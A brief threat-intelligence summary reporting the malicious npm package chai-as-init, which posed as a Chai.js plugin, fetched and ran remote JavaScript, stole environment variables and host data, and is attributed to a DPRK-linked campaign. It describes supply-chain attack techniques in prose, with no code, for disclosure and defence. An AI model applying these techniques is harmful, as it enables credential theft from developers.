ESRC found that the malicious npm package chai-as-init, distributed in versions 1.4.5 through 1.4.7, impersonated a Chai.js plugin while hiding malicious code in only two files copied into a mostly legitimate-looking pino package tree. Loading the package spawned a detached background process and used a second-stage loader to fetch and execute remote JavaScript, with later versions exfiltrating the full process.env before receiving code from Vercel-hosted C2 infrastructure. The recovered v1.4.5 payload collected host, OS, user, WSL, filesystem, and command-output data, encrypted it, and posted it to an attacker server. ESRC attributed the activity to the DPRK-linked Contagious Interview campaign based on matching TTPs including typosquatting, Base64-encoded C2 URLs, environment-variable theft, new Function-based RCE, axios C2 traffic, and Vercel infrastructure.